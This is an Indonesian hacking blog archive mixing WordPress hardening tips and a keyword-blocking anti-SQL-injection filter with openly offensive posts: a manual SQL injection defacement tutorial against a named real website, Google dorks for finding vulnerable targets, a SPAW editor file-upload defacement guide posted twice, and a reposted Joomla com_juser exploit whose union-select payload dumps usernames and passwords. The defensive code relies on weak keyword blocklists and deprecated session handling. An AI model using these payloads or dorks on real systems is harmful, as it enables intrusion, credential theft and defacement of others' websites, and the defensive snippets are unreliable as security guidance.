Tampilkan postingan dengan label Hack. Tampilkan semua postingan
Tampilkan postingan dengan label Hack. Tampilkan semua postingan

Selasa, 16 Juli 2013

17 cara mengamankan website

Seperti yang telah kita ketahui sebelumnya, website yang menggunakan CMS instant seperti Wordpress rentan terhadap hacking, malware, dan aktivitas cybercrime lainnya. Untuk itu, butuh pengamanan ekstra terhadap Wordpress anda.


Berikut 17 Cara untuk menambah sistem keamanan (security) WordPress + Plugin :
1. Tidak Menggunakan Username “admin”.
Karena username “tertinggi” tersebut yang sebetulnya menjadi makanan empuk bagi para hacker. Ada baiknya menggunakan username dengan mengkombinasikan antara huruf dan angka. Misal :“u53r6w”. Terkesan 4L4Y bukan? Namun terkadang kita harus bersikap lebih bervariasi daripada para hacker.
2. Mengupdate ke Versi Terbaru.
Selalu mempunyai website yang terupdate, merupakan langkah bijak bagi para pengguna WordPress. Hal ini untuk menutup celah-celah (hole) yang dapat dimasuki oleh para hacker. Informasi update-an baru biasanya akan tersedia di website utama WordPress[http://wordpress.com/] atau halaman depan administrator (wp-admin).
3. Hapus File “readme.html”.
File “readme.html” berisi versi Wordpress anda. Hapus saja file tersebut sesaat setelah anda melakukan upgrade WordPress.
4. Hapus File “install.php”.
File “wp-admin/install.php” hanya dipakai saat menginstall Wordpress saja. Sudah tidak diperlukan lagi bila Wordpress sudah berjalan. So, hapus juga file tersebut dari sistem WordPress.
5. HAPUS! Dan Jangan Menggunakan Theme Default WordPress
Belakangan terdapat isu bahwa banyaknya hacker yang menyerang website WordPress, masuk melalui theme Default yang diberikan Wordpress yaitu “Twenty Ten”, “Twenty Eleven”, dan“Classic”. Ada baiknya kita tidak mempergunakan theme tersebut, dan dihapus saja. Karena tanpa dipergunakan pun, hacker masih bisa menyerang lewat sana.
6. Gunakan Password Yang Kuat.
Sekali lagi kita harus belajar menjadi manusia yang 4L4Y. Namun hal ini dapat membantu kita jika kekuatan password yang kita miliki maksimal. Bisa juga menggunakanhttp://strongpasswordgenerator.com/ untuk mendapatkan password yang kuat.
7. Lindungi File “wp-config.php”.
Kita harus membuat file ini tidak bisa diakses oleh siapapun juga. Mudah saja, tinggal masukkan kode ini di file “.htaccess” anda :
[Image: wp1.jpg]
8. Blokir Folder “wp-xxxxxx”.
Kita tidak ingin folder-folder dalam system Wordpress dijelajahi oleh siapapun. Jadi, masukkan kode ini di file “robot.txt” :
[Image: wp2-300x35.jpg]

9. Hilangkan Versi WordPress.
Masukkan kode ini di file “functions.php” pada themes anda :
[Image: wp3-300x47.jpg]
10. Ubah Table “Prefix”.
Cara ini cukup efektif, tapi memang agak susah terutama bila website sudah berjalan. Caranya adalah dengan membackup terlebihdahulu database anda. Dengan bantuan Notepad, lakukan“find and replace” dengan merubah setiap awalan “wp_” menjadi prefix lain misalnya “newp_”.
Setelah selesai, import SQL-nya ke phpmyadmin sehingga disana akan ada 2 macam tabel. Yaitu tabel dengan awalan “wp_” dan “newp_”.
Jika proses pengubahan selesai, kini tinggal mengganti table prefix yang ada di “wp-config.php”. Cari kode berikut :
[Image: wp4-300x57.jpg]
Lalu ganti dengan table prefix “newp_”, maka kodenya menjadi seperti ini :
[Image: wp5-300x53.jpg]
11. Sesuaikan CHMOD Permission.
Pastikan CHMOD permission pada file dan folder website anda telah sesuai dengan yang disarankan. biasanya permission untuk folder : 755, dan untuk file : 644[http://www.qwords.com/kb/mengganti-chmod-permission/]
12. Backup Secara Berkala.
Ada baiknya kita mempunyai backup secara berkala. Untuk akun hosting yang menggunakan cPanel, dapat membuat file backup melalui fitur backup yang disediakan oleh cPanel (cPanel->Backups). File backup biasanya berekstensikan .tar.gz, dapat diamankan / disimpan dengan mendownload file tersebut ke komputer pribadi anda. Sehingga jika sewaktu-waktu website anda terkena hack, anda dapat mengupload kembali file backup tersebut, kemudian me-request kepada pihak teknis untuk merestore file backup anda melalui Support Ticket di Tempat hosting anda..

13. Scan Komputer anda
Hal yang sering tidak disadari, ternyata komputer kita sendiri yang memasukan malware ke dalam hosting yang kemudian menjadi alat bagi pembuat malware untuk dapat masuk ke sistem website/hosting kita. jadi sebaiknya selalu scan komputer/laptop yang anda pergunakan secara rutin.
14. Ganti password secara berkala
Sudah pasti jika website kita terhack, dengan segera kita langsung mengubah password dengan password yang baru, namun akan lebih baik jika hal ini dilakukan setiap bulan dan secara menyeluruh (FTP,MYSQL,CPANEL, dan Dashboard wordpress)
15. Mengganti secret key default di wp-config.php
untuk secret key yang baru dapat anda dapatkan dari situs resmi wordpresshttps://api.wordpress.org/secret-key/1.1/salt/
setelah seorang hacker berhasil login di Wordpress kita, maka cookies dari record akan disimpan agar hacker bisa tetap masuk ke dashboard walaupun password sudah kita ganti dengan yang baru, untuk mengantisipasinya silakan ganti secret key di “wp-config.php” dengan yang anda dapat di link diatas.
contoh secret key:
define(‘AUTH_KEY’, ‘h4VSBp#[])*6K5;vV&fR0]GccHyziEPbs)3>EhK.$P~hW]W4v!Q:47s2GRrq@!K&’);
16. Cek .htacess segera
Sempatkan untuk mengecek file satu ini, jika anda tidak ingin setiap komputer yang mengakses website anda malah terkena malware dari website berbahaya yang dipasang hacker di htaccess website anda. dengan me-redirect website anda ke website berbahaya, ini membuat anda akan terkena hack dan terinfeksi malware disaat yang bersamaan.
[Image: scripthackerdihtaccess.jpg]
17. Me-recreate hosting anda
Poin terakhir ini anda lakukan hanya jika anda berulang kali terkena hack kembali sedangkan semua tips security sudah anda lakukan, ini disebabkan hacker sudah menanam program didalam website anda sehingga memudahkan hacker untuk kembali melakukan hack, maka anda dapat membersihkan hosting anda ke keadaan baru membeli hosting, silakan membuat support tiket ke bagian teknis dengan subject "recreate hosting".
Langkah-langkah di atas tidak menjamin website Wordpress anda aman 100% dari hacker.
Semoga tutorial ini dapat membantu anda yang ingin selalu menjaga website tetap aman.
Berikut ini Plugin Security Terbaik untuk Mengamankan Blog WordPress:

Secure WordPress
Secure Wordpress akan menjaga keamanan file instalasi Wordpress dengan menghapus informasi fatal pada halaman login, menambahkan index.html ke setiap direktori content, menyembunyikan versi Wordpress dan banyak lagi.
WP Firewall 2
Dengan bantuan plugin ini, blog bisa menjadi lebih kebal dari berbagai serangan yang dapat merugikan blog. WP Firewall akan mem-blok setiap aktifitas yang bersifat inject. Selain itu jika ada serangan yang terjadi, plugin ini akan memblok kemudian memberi tahukannya ke email admin mengenai detail serangan, IP penyerang, jenis serangan dll.
Stealth Login
Plugin Wordpress Stealth Login ini berfungsi untuk membuat url dari halaman login pada blog wordpress menjadi lain dari biasanya. Jika pada Wordpress standart kita melakukan login via urlnamadomain.com/wp-login.php, maka dengan bantuan plugin ini kita bisa membuatnya berbeda. Url halaman login bisa kita modif sesuka kita, misal menjadi namadomain.com/masuk. Jadi hanya admin saja yang dapat mengakses Dashboard wordpress.
Exploit Scanner
Plugin ini akan memindai semua file yang ada pada direktori blo/website, posting, komentar dan juga tabel database untuk memonitor dan memberitahukan tentang adanya file atau celah yang mencurigakan.g
Timthumb Vulnerability Scanner
Tak sedikit theme Wordpress yang menggunakan script timthumb (timthumb.php). Dan sayangnya file timthumb ini seringkali mempunyai celah keamanan yang dapat membahayakan penggunanya. Maka dengan bantuan plugin ini kita bisa menambal celah keamanan tersebut.
WP Security Scan
WP Security Scan untuk Wordpress / blog berfungsi untuk memindai kerentanan keamanan dan menyarankan tindakan korektif seperti:
Password
File permissions
Keamanan database
Menyembunyikan Versi WordPress
Menghapus WP Generator META tag
Berikut hanyalah beberapa rekomendasi saja, selebihnya masih banyak lagi plugin-plugin yang dapat kita gunakan untuk lebih meningkatkan security blog Wordpress kita.
Plugin Security Wordpress bisa dilihat selengkapnya di: http://wordpress.org/extend/plugins/tags/security

sekian dari ane =))

Senin, 15 Juli 2013

Patch SQL

BIASAKAN UNTUK MEMBACA !!

Sebelumnya mari kita liat pengertian mysql injection secara umum :
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Para pemula biasanya lebih senang mengexploitasi mysql v.5 dari pada v.4 . mysql v.5 support terhadap information_schema yang memudahkan attacker untuk melancarkan serangan injeksi. Bahkan dengan beberapa sql scanner tools para lamer dan scriptkiddies dengan begitu mudahnya dapat melakukan serangan – serangan.

Contoh Serangan SQL ., missalkan saya ambil contoh SQL V.5

Code:
http://localhost/cobain/injector/index.php?id=-4+union+select+1,@@version,3,4,5--

[Image: 6_zpsa23ad91b.jpg]

Pada kesempatan kali ini saya hanya akan mencoba melakukan pencegahan dengan predefined atau PHP Superglobal . $_SERVER['REQUEST_URI'] yang menangkap nilai pada URL.

buat file php baru dengan nama antisqli.php lalu masukkan script berikut.

Code:
<?php
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64")) {
echo "Maaf Bro... Apa tuh? Mau Nakal Yah :p";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
}
?>

Setelah itu kita melakukan include pada index.php di dalam folder injector tadi.

Code:
<?php
    include 'library/config.php';
    include 'library/opendb.php';
    include 'antisqli.php';
    ?>

Di bagian paling atas tinggal tambahkan aja include ‘antisqli.php’;. Setelah itu buka link yang tadi kita sisipkan perintah SQL dan apa yang terjadi?
[Image: 7.jpg]

Keren kan? Oke kita lihat lagi antisqli.php – nya…

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || strpos($_SERVER['REQUEST_URI'], "concat") || strpos($_SERVER['REQUEST_URI'], "union") || strpos($_SERVER['REQUEST_URI'], "base64"))

Jika variabel di URL lebih dari 255 atau (tanda || dibaca atau) ada kata “concat“, “union” dan “base64“.

Code:
echo "Maaf Bro... Apa tuh? Mau Nakal Yah ";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;

Maka akan muncul pesan “Maaf Bro… Apa tuh? Mau Nakal Yah ?
kemudian dilanjutkan dibawahnya.

Nah gak hanya cuman union / concat kan jika kita melakukan SQL Injection. Ada select, @@version dan lain – lain. Kan kalian yang lebih jago kalo soal beginian., Nantinya kalian tinggal tambahkan aja menjadi.

Code:
strpos($_SERVER['REQUEST_URI'], "concat")

Jangan lupa tanda || (atau) penggunaan stripos (case insensitive).

Code:
if (strlen($_SERVER['REQUEST_URI']) > 255 || stripos($_SERVER['REQUEST_URI'], "concat") || stripos($_SERVER['REQUEST_URI'], "union") || stripos($_SERVER['REQUEST_URI'], "base64")) {

Atau menggunakan preg_match:
Code:
<?php
$berbahaya = array("union", "concat", "base64");

$gabungsemua = implode("|",$berbahaya);
if((strlen($_SERVER['REQUEST_URI']) > 255) || (preg_match("/".$gabungsemua."/i",$_SERVER['REQUEST_URI']))){
echo "Maaf Bro... Apa tuh? Mau Nakal Yah";
@header("HTTP/1.1 414 Request-URI Too Long");
@header("Status: 414 Request-URI Too Long");
@header("Connection: Close");
@exit;
?>

Sekarang union,UNIon,unIoN dan variasi – variasi yang lain pasti gak akan berhasil…

cara deface website menggunakan SQL Injection Manual


hay Sobat gmn kabarmu :D (sok kenal banget :v wkwkkw )
kali ini ane akan membagikan tutorial cara deface web menggunakan metode SQL Injection MANUAL

Hal pertama yang harus sobat lakukan adalah mengetahui apakah situs tersebut terkena celah SQL Injection atau tidak, yaitu dengan membuat sebuah error dengan menambahkan karakter (‘) “tanpa tanda kurung” setelah / sesudah angka pada url
Contoh : http://situsq.com/berita.php?id=14’

http://situsq.com/berita.php?id=’14

Apabila terlihat pesan error seperti ini :
You have an error in your SQL syntax.You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1

Maka bisa dipastikan situs tersebut terdapat celah SQL Injection…

dalam sql manual kita butuh plugin tambahan untuk membantu proses ini, nama plugin nya adalah HACKBAR,

Hackbar ini sebenarnya berfungsi untuk menguji sistem kita misalnya dari sql injection.. atau XSS attack.. atau mengenkripsi password md5 ataupun SHA-1
Hackbar bias di dapat disini:

https://addons.mozilla.org/id/firefox/addon/hackbar/

[/quote]langsung saja ke TKP

yang kita lakukan adalah mencari web yang vuln SQLi ( ada bug sqlinjection ) dengan sebuah dork

inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=

Copas dork di atas ke google.com , setelah itu pilih target sobat
contoh :
http://www.zenfocus.com/partners.php?id=2
nah sekarang kita test apakan vuln website tersebut dengan menambahkan tanda (‘) tanpa tanda kurung

[/URL]

Di gambar tersebut kita lihat bahwa situs ini vuln SQLi ( mempunyai bug SQL injection)
Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” tanpa tanda kutip
Bagaimana kita agar mengetahui jumlah table di database yaitu dengan cara melihat awal terjadinya error kembali

Contoh:
http://www.zenfocus.com/partners.php?id=2 order by 1–  no error
http://www.zenfocus.com/partners.php?id=2 order by 2–  no error
http://www.zenfocus.com/partners.php?id=2 order by 3–  no error
http://www.zenfocus.com/partners.php?id=2 order by 4–  no error
http://www.zenfocus.com/partners.php?id=2 order by 5–  no error
http://www.zenfocus.com/partners.php?id=2 order by 6–  no error
http://www.zenfocus.com/partners.php?id=2 order by 7–  error

[Image: bahan-post-2_zps4ff3bcc5.png]
eror table ke 7

Berarti jumlah kolom pada database nya ada 6 kolom
Langkah selanjutnya yaitu mengetahui dimana angka-angka yang bisa di buat injection / tempat kita memasukkan perintah-perintah selanjutnya.
Cara untuk mengetahui angka-angka tersebut ialah dengan mengganti perintah “ order by “ dengan “ union select “ disertai berapa jumlah kolom yang kita temukan tadi dan tanda – di depan angka

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,2,3,4,5, 6–



Di gambar tersebut kita lihat muncul angka 2 dan 3 nah itulah yang kita maksud dengan angka yang kita buat memasukan perintah-perintah selanjutnya
Sekarang tahap selanjutnya ialah mengetahui versi database nya
Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,@@version,3,4,5, 6–



Nahh di gambar kita bisa lihat muncul 5.0.96 itu berarti database web tersebut versi 5 berarti kita beruntung karena jika kita menemukan versi 4. maka kita akan kerepotan karena jenis perintah SQL nya berbeda yaitu dengan menebak 1 per 1 tabel yang ada di dalam database tersebut
Sekarang kita melangkah ke tahap selanjutnya yaitu memunculkan nama-nama table yang ada di dalam web tersebut dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda –

Contoh:
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()–



Dari gambar tersebut terlihat ada table “ admin ” jika kita menemukan web lain dan di dalamnya tidak ada table admin maka biasanya user pass admin terletak pada kolom administrator atau user tinggal pandai-pandainya kita mencermati setiap tabel yang kita curigai sebagai tempat user pass admin.
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut
Degan cara mengganti perintah “ table_name ” yang ada berada dalam perintah “ group_concat(table_name) ” dengan perintah “ column_name ” menjadi “ group_concat(column_name) ” dan mengganti perintah “ .tables ” yang berada di perintah “ information_schema.tables “ dengan perintah “ .columns ” menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name= ”



dan di ikuti hasil convert MySQL CHAR() nah disini keuntungan dari kita memakai HACKBAR yaitu kita tidak perlu mencari converter MySQL CHAR() ke web-web lain karena hackbar sudah menyediakanya letaknya:
klik tombol SQL –> MySQL –> MySQL CHAR()



setelah itu akan muncul javaScript Aplication sebagai berikut:
kita copas ( copy paste ) nama kolom yang berada dalam table yang kita curigai sebagai tempat tersimpanya user pass admin
contoh tadi kita menemukan table admin jadi kita copas ( copy paste ) admin kedalam javaScript Aplication tersebut setelah itu klik ok



sehingga perintah kita menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)–

Setelah itu tekan Execute
Dan hasilnya



Nahh muncul kolom adminId,adminName,adminPass
Sekarang langkah selanjutnya ialah membuka data2 yang ada dalam kolom-kolom yang muncul tersebut.
Caranya ialah mengganti perintah “ column_name “ yang berada di perintah “ group_concat(table_name) ” dengan nama-nama kolom yang kita temukan tadi yaitu “adminId,adminName,adminPass ” sehingga menjadi “ group_concat(adminId,adminName,adminPass) ” dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ perintah admin ini saya dapat dari nama table yang kita temukan tadi, jangan lupa menambahkan perintah 0x3a pada sela-sela nama kolom tadi 0x3a adalah hasil hexa dari tanda :
Sehingga jika digabung perintah nya menjadi
http://www.zenfocus.com/partners.php?id=-2 union select 1,group_concat(adminId,0x3a,adminName,0x3a,adminPass),3,4,5,6 from admin—



tekan Execute

dan hasilnya

[URL=http://i1285.photobucket.com/albums/a594/Rizal_Sullivan_Chapellanoz_Sevenfoldisme/bahan-post-210_zps4ef6f79f.png[/IMG]

Setelah itu tinggal nyari admin loginya heheheheh
Sebenarnya banyak variasi sql injection semunya tergantung individu masing-masing mau pakai cara mana yang paling nyaman buat sobat

NB : PESAN DARI ANE , INGAT berjuta-juta WEBSITE yang anda DEFACE tidak akan membuat anda menjadi HEBAT

SALAM CYBER DARI SAYA
we are Indonesian Security Down
expect us

Terimakasih
wassallam

Rabu, 10 Juli 2013

Belajar hacking dari awal :)

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar


[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar

[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR

[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR


[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar

[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR

[Image: 2884dbc.jpg]

LANJUT

[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Selasa, 09 Juli 2013

Hack Web Untuk Newbi

(Pemula)Tutor Lengkap+Gambar Deface Spaw Upload Vulnerably Maaf sebelumnya buat para mimin dan momod
kalau saya repost
dari tutor http://hacker-newbie.org/showthread.php?...light=spaw
Kalau memang tidak berguna silahkan hapus

Menurut saya Threed ini sangat berguna untuk yang benar-benar
pemula seperti saya,,soalnya mengingat beberapa hari lalu ada yang post http://hacker-newbie.org/showthread.php?tid=12893 menanyakan dari mana memulai untuk deface,,disini akan dijelaskan dengan GAMBAR semoga berguna buat yang bener-bener pemula seperti saya Hantu

Oke mari dibahas

Pertama : search dorknya di google : inurl:”spaw2/dialogs/” atau inurl:”spaw2/uploads/files/”
Lihat gambar

Spoiler Hide
[Image: 30j334i.jpg]

Setelah anda search dork tadi di google
pilih salah satu web yang mau di deface ingat gx semua web bisa yah :P

Lihat gambar
Spoiler Hide
[Image: 9u4wup.jpg]

setalah anda masuk dalam webnya
anda lihat URLnya di adrees bar
Contoh URLNYA : http://contoh.com/spaw2/uploads/files/
bagian /spaw2/uploads/files/

diganti dengan spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

Sehingga Menjadi http://contoh.com/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2&lang=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files

LIHAT GAMBAR
Spoiler Hide
[Image: 2z4a0s3.jpg]
Spoiler Hide
[Image: zv3bjo.jpg]

Tekan Enter
Akan Terbuka Gambar Seperti INI
LIHAT TUTOR DALAM GAMBAR
Spoiler Hide
[Image: x35s29.jpg]
Spoiler Hide
[Image: 14jqof7.jpg]

Lanjut
lihat terus gambar tutor ada didalam gambar
Spoiler Hide
[Image: 2m6of8l.jpg]

LANJUT
Spoiler Hide
[Image: 2076hw4.jpg]

Lanjut TUTOR ADA DI GAMBAR
Spoiler Hide
[Image: 2884dbc.jpg]

LANJUT
Spoiler Hide
[Image: 34y4ahe.jpg]

SELESAI
Semoga bisa dimengerti

KALAU GAMBAR KURANG JELAS DIREFRESH AJA ATAU BUKA SATU-SATU YAH

SUmber Hn..

Sabtu, 29 Juni 2013

Joomla Component Joomlaequipment 2.0.4 (com_juser) SQL Injection



Joomla Component com_juser (id) SQL injection Vulnerability
==================================================================================

etfffffjtiiiiiiiiiiiiii;,;iitfffffffGGDDDDEW#K;.
if E###################################W######Wi
iE,K##########################################Wi
iDtW###########WEftt;;ittLGLEEEKW##############j
iKD#######WEDft, ;tDW###########f
iWW####Kfi. You Gay iLK########f
jW###WL ,L######Wt
iW#WL; .. D#####Wi
iWK, tLDDEEj, ;#####Wi
f#D .G#######Ei K####E,
L## iGDGi. D#########D. L####D.
L##i tWWWWWL iKE#########j i####G.
tW#i D#WWKEWj fDL#########L .E###L
iW#j ;K####W#K; ;WK######WGKf G#WWj
,E#D .GW#######j ;L######KGE, ,E##Wj
G#G .tE#######L ,Gj,D#####WD; GWDW#f
L#E ,GK#####KKj iE#E.,fDEKDj. ;DWjiWWi
.G#Wf ;DW###EED, jW###L . .fK#KLfWK;
,E##Wt ;fDKKf. W####Wf iK#######K;
iWWL#Ki ,W#####K, .f##########f
;W#;L#WELt, .ijjji. f##########Wi
iWW j#####WDj;,. iK##########E.
;KW,K#########WKDj ;, .i.E###########K,
,ED;W############K; .DK ;Et fWtW###########Wi ,
,EL,W#############f iWG t#f jWfW###########Wt,
,Et.E#############L j#L,L#i jWfW###########Wj
,Dj L#############EGDK##LL#f;iDWL############Wj
,EE.f######################################EEWi
,EKjf######################################jD#f
jWWE####### [LatinHackTeam] ##GDWj
,K#################################W######EfWj
fEDDEEEEDLLLjtiiiiiiiiiiiitjLLGEEKjK#####WD#G.



###################################################
[+] Author : Chip D3 Bi0s
[+] Author Name : Russell...
[+] Email : chipdebios[alt+64]gmail.com
[+] Greetz : d4n1ux + eCORE + rayok3nt + x_jeshua
[+] Group : LatinHackTeam
[+] Vulnerability : SQL injection
[+] Google Dork : imagine ;)
[+] Email : chipdebios[alt+64]gmail.com

###################################################



Example:
http://localHost/path/
index.php?option=com_juser&task=show_profile&id=70[SQL code]
------
SQL code:
+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--
-----
DEMO LIVE:

http://demo.joomlaequipment.com/index.php?option=com_juser&task=show_profile&id=70+and+1=2+union+select+1,2,concat(username,0x3a,password)chipdebi0s,4,5,6,7,8,9,10,11,12,13+from+jos_users--

+++++++++++++++++++++++++++++++++++++++
#[!] Produced in South America
+++++++++++++++++++++++++++++++++++++++


<creationDate>25.05.2007</creationDate>
<author>Joomlaequipment</author>
<copyright>Joomlaequipment"Ð’©2007</copyright>
<license>Comercial</license>
<authorEmail>support@joomlaequipment.com</authorEmail>
<authorUrl>http://joomlaequipment.com</authorUrl>
<version>2.0.4</version>
<description>Registration Manager</description>

# milw0rm.com [2009-06-01]

Minggu, 23 Juni 2013


cuman mau mengingatkan
jangan sampe ke asyikan deface web orang lain sampe sampe security web kita gak di perhatikan
mungkin kalaw bug sql or apalah itu tidak ada di web kita
tapi bagaimana jika web 1 hostingan sama kita itu di serang dan melakukan jumping server
maka matilah web kita :-D dia bisa melihat user login mysql kita :-D
ada sedikit cara untuk melindungi nya login admin nya
1.menggunakan managemen protect web yang ada di cpanel pilih lah dir login admin nyalalu seting user & password nya
2.menggunakan ip khusus dalam arti hanya ip kita saja yang bisa masuk ke dir admin
cra nya dengan menggunakan .htaccess


AuthUserFile /dev/null
AuthGroupFile /dev/null
 
AuthName “Access Control”
AuthType Basic
 
order deny,allow
deny from all
 
#IP address to Whitelist
allow from xxx.xxx.xxx.xxx
yang xxx.xxx itu ip kita / yang sering kita gunakan
3. buat lah file dengan nama protext.php / apalah terserah
<?php 



session_start(); 


$admin_user_name = “nama”; 

$admin_password = “password”; 

//you can change the username and password by changing the above two strings 


if (!isset($HTTP_SESSION_VARS['user'])) { 



if(isset($HTTP_POST_VARS['u_name'])) 

$u_name = $HTTP_POST_VARS['u_name']; 



if(isset($HTTP_POST_VARS['u_password'])) 

$u_password = $HTTP_POST_VARS['u_password']; 



if(!isset($u_name)) { 

?> 

<HTML> 

<HEAD> 

<TITLE><?php echo $HTTP_SERVER_VARS['HTTP_HOST']; ?> : Authentication Required</TITLE> 

</HEAD> 

<BODY bgcolor=#ffffff> 

<table border=0 cellspacing=0 cellpadding=0 width=100%> 

<TR><TD> 

<font face=verdana size=2><B>(Access Restricted to Authorized Personnel)</b> </font></td> 

</tr></table> 

<P></P> 

<font face=verdana size=2> 

<center> 

<?php 

$form_to = “http://$HTTP_SERVER_VARS[HTTP_HOST]$HTTP_SERVER_VARS[PHP_SELF]“; 



if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 

$form_to = $form_to .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 



?> 

<form method=post action=<?php echo $form_to; ?>> 

<table border=0 width=350> 

<TR> 

<TD><font face=verdana size=2><B>User Name</B></font></TD> 

<TD><font face=verdana size=2><input type=text name=u_name size=20></font></TD></TR> 

<TR> 

<TD><font face=verdana size=2><B>Password</B></font></TD> 

<TD><font face=verdana size=2><input type=password name=u_password size=20></font></TD> 

</TR> 

</table> 

<input type=submit value=Login></form> 

</center> 

</font> 

</BODY> 

</HTML> 



<?php 

exit; 


else { 



function login_error($host,$php_self) { 

echo “<HTML><HEAD> 

<TITLE>$host : Administration</TITLE> 

</HEAD><BODY bgcolor=#ffffff> 

<table border=0 cellspacing=0 cellpadding=0 width=100%> 

<TR><TD align=left> 

<font face=verdana size=2><B> You Need to log on to access this part of the site! </b> </font></td> 

</tr></table> 

<P></P> 

<font face=verdana size=2> 

<center>”; 



echo “Error: You are not authorized to access this part of the site! 

<B><a href=$php_self>Click here</a></b> to login again.<P> 

</center> 

</font> 

</BODY> 

</HTML>”; 

session_unregister(“adb_password”); 

session_unregister(“user”); 

exit; 




$user_checked_passed = false; 





if(isset($HTTP_SESSION_VARS['adb_password'])) { 



$adb_session_password = $HTTP_SESSION_VARS['adb_password']; 

$adb_session_user = $HTTP_SESSION_VARS['user']; 





if($admin_password != $adb_session_password) 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 

else { 

$user_checked_passed = true; 







if($user_checked_passed == false) { 



if(strlen($u_name)< 2) 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 



if(isset($admin_password)) { 



if($admin_password == $u_password) { 



session_register(“adb_password”); 

session_register(“user”); 



$adb_password = $admin_password; 

$user = $u_name; 


else { //password in-correct 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 



else { 

login_error($HTTP_SERVER_VARS['HTTP_HOST'],$HTTP_SERVER_VARS['PHP_SELF']); 




$page_location = $HTTP_SERVER_VARS['PHP_SELF']; 

if(isset($HTTP_SERVER_VARS["QUERY_STRING"])) 

$page_location = $page_location .”?”. $HTTP_SERVER_VARS["QUERY_STRING"]; 



header (“Location: “. $page_location); 




?>

4.tinggal masukan ke dir admin di index.php
cara nya include ‘protect.php’;

5.lalu protect.php nya kamu encrypt supaya tidak terbaca :-D

jika menggunakan semua nya berarti security web kamu ada 3 :-D
*1 ip protect jika tembus masih ada 2 lagi :-D
* 2 page password protect ( yang di cpanel ) jika tembus juga masih ada 1 lagi :-D
*3 password protect page jika masih tembus juga ya tinggal menu login admin nya aja hehhehe
tapi kemungkinan besar gak mungkin bisa tembus semua nya

Sumber : http://forum.indonesiansecuritydown.org/thread-1.html